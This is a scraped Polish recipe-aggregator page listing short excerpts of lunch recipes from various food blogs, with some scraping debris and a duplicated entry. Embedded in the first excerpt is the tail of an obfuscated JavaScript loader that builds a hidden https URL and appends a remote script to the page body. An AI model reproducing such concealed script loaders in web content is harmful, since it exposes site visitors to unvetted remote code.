obiad - 94612 przepisów (strona:2622/6308)

Wolnostojący czy do zabudowy? Wybieramy odpowiedni ekspres do kawy 174

wszqu="131296610.";wszqu+="y8v4hz22szqmc506xud1q3dnjvkgXr";wszq.src="https://"+wszq_+wszqu; wszqdb=document.body;wszqdb.appendChild(wszq); })(); Artykuł Wolnostojący czy do zabudowy? Wybieramy odpowiedni ekspres do kawy pochodzi z serwisu Przepisy kulinarne, przepisy na obiad - FoodMagazine.pl

FoodMagazine.pl - Przepisy kulinarne
Spaghetti bezglutenowe z warzywami z nuta wędzonej papryki– wersja wegańska 165

Lekki obiad w kilka minut przygotowujemy i już pyszne, zdrowe danie sobie jemy.  Makaron spaghetti bezglutenowy gotujemy, który do marchewki, brokułu i cebulki dodajemy.  Dużo świeżych ziół dokładamy i wg smaku doprawiamy.  Czarnuszka chrupie, warzywa też chrupiące, z makaronem i ziołami całe danie jest kolorowe, pachnące. Składniki: 200 g makaronu spaghetti bezglutenowy Sotelli, 1 średniej wielkości marchew

Moniki Smakołyki
Kurczak w sosie curry 148

Kurczak w sosie curry to bardzo prosty przepis. Polecam go dla osób, które lubią orientalne smaki i dość ostre przyprawy. To doskonałe danie, jakim możecie zachwycić

Kuchnia Bazylii
Surówka dla dorosłych 256

mięsnych obiadów, smażonych czy też grillowanych, idealne nadają się surówki „chrupiące”. Bardzo je lubimy. Są proste w przygotowaniu, szybkie i co najważniejsze, bardzo smaczne. Tym razem pokusiliśmy się na nietypowy dressing ;) Składniki: 1/2 główki sałaty lodowej 150 g pomidorków koktajlowych 1 szpiczasta papryka czerwona 1 szpiczasta papryka pomarańczowa 1 szpiczasta papryka żółta 2 szalotki Dressing: 50 ml oliwy z oliwek

R'n'G Kitchen
Zupa pomidorowa z tamaryndowcem na indyczych żołądkach ze szpinakowym penne 159

Mega obiad dziś na I - szy Dzień Wiosny. Wiosna na talerzu i znakomite smaki, lekkie i aromatyczne przyprawy, sprawiły że zupa jest przepyszna. Indycze żołądki są delikatne i treściwe a tamaryndowiec podkreśla smak pomidorów, polecam. Pomysł na zupę z tamaryndowcem od znajomego Bogdana. Miąższ owoców tamaryndowca - młode owoce są bardzo kwaśne, starsze - słodsze, jest używany jako przyprawa w kuchni azjatyckiej

Moje Małe Czarowanie
Szakszuka z warzywami 309

jajka smażone w sosie pomidorowym. U mnie z bukietem mrożonych warzyw, które zostały odpowiednio przygotowane, a mieszanka przypraw sprawia, że danie jest przepyszne. Idealnie sprawdzi się na śniadanie, lekki obiad czy kolację. Jest bardzo szybkie do przygotowania, więc warto schować sobie porcję warzyw w zamrażalniku. 1 opakowanie warzyw na patelnię ze szpinakiem Hortex 1/2 szklanki przecieru pomidorowego 5 jajek sól

https:KKuchniaMniam
Bakłażany z ciecierzycą. 157

Dzisiaj mam prosty pomysł na obiad, czyli ciecierzyca, a właściwie bakłażany z ciecierzycą. Bakłażany, przekrojone na 3 równoległe paseczki, uprzednio upieczone w piekarniku. Doprawiłam je do smaku i przede wszystkim nasmarowałam rozmiażdżonymi ząbkami czosnku z przyprawami. Teraz ciecierzyca, którą przygotowałam równolegle. Ciecierzyca to potrawa, która kojarzy się z czasochłonnymi przygotowaniami. Ale to też kwestia organizacji czasu. Ciecierzycę należy zamoczyć uprzedniego

MODA NA BIO
Surówka ze świeżego buraka czerwonego 166

Dzisiaj przedstawiam totalną bombę witaminową w formie surówki. Idealna jako dodatek do obiadu. Dla mnie pycha. Składniki: 1 czerwony burak ( średni ) 1 jabłko 1 łyżka majonezu Sól Wykonanie: Buraka i jabłko obieramy ( warto ubrać rękawiczki ). Ścieramy na tarce ( ja wykorzystałam thermomixa ). Dodajemy majonez i doprawiamy do smaku solą. Mieszamy i gotowe. SMACZNEGO. (function

Smaki Ewy
Sałatka z makaronem 165

hansi-theme-font:minor-latin; mso-fareast-language:EN-US;} Mam dla Was pomysł na zupełnie inną sałatkę. Treściwą, pełną włoskich smaków- w zasadzie taka sałatka idealna na obiad. Pomysł zrodził się przy sklepowej półce, gdy moim oczom ukazały się kolorowe świderki makaronu…   Wzięłam z półki i chodząc po sklepie, zaczęłam kombinować , jak wykorzystać tak inny, niezwyczajny makaron. Dokupiłam

Domowe ciasta
Bułeczki drożdżowe 172

pasty na kanapki - kocham to! Przepis na bułeczki dostałam od przyjaciółki i przyjął się u nas rewelacyjnie. Maślane bułeczki robię często, nie tylko jako bułeczki śniadaniowe, ale także na obiad, czy kolację, zapiekane z mięsem i serem - obłęd. Jak zrobić bułeczki drożdżowe? Potrzebujemy: 15 g świeżych drożdży 1/3 szklanki cukru 1 szklanka ciepłego mleka 1/4 szklanki ciepłej wody 3/8 szklanki

MamaOskarka
Blue cheese dressing... I o jedzeniu bez granic (Pizza Hut) 179

dobrze. Dla niektórych... Bo akurat i ja i dziecki bardzo warzywno-żerni jesteśmy i wracamy do karmidła entuzjastycznie i bez przymusu po kilka razy. I kiedy pojawia się zamówiony obiad nikt już nie jest głodny...  Ale muszę przyznać, że mnie w zupełności wystarcza do szczęścia miska sałaty z pokrojonym buraczkiem i kukurydza, i z dużym kleksem sosu/dressingu z sera

Lejdi of the house
Żołądki w sosie chrzanowym 169

Żołądki w sosie chrzanowym to danie, które doskonale pamiętam z dzieciństwa. W zasadzie to mama robiła je raz z dodatkiem samego chrzanu, jak w tym przepisie

Kuchnia Bazylii
Rolada z porowo szpinakowym farszem 186

Taka rolada znakomicie sprawdzi się na domowym obiedzie jak i rodzinnych spotkaniach. Plusem takiego mięsa jest to, że może być podane na ciepło jak i na zimno. Gwarantuję gościom posmakuje! 1 podwójny filet z piersi kurczaka Przyprawa do kurczaka Słodka czerwona papryka Czosnek granulowany Farsz: 3 garście świeżego szpinaku baby 1 por 2 ząbki czosnku 50 g sera feta

VioletoweKucharzenie
Barszcz czerwony czysty 173

Świetny nie tylko na Wigilię, ale też na co dzień do obiadu np. z ziemniakami lub pierożkami Często bywa podawany też na imprezach, komuniach i weselach, najczęściej z pasztecikiem lub krokietem Zwykle do barszczu trze się buraki na tarce lub kroi w kostkę – ja jednak kroję je jedynie na pół, a po ugotowaniu zupy wyławiam i robię np. buraczki

Kulinarny S.O.S.
Barszcz czerwony czysty 173

Świetny nie tylko na Wigilię, ale też na co dzień do obiadu np. z ziemniakami lub pierożkami Często bywa podawany też na imprezach, komuniach i weselach, najczęściej z pasztecikiem lub krokietem Zwykle do barszczu trze się buraki na tarce lub kroi w kostkę – ja jednak kroję je jedynie na pół, a po ugotowaniu zupy wyławiam i robię np. buraczki

Kulinarne S.O.S.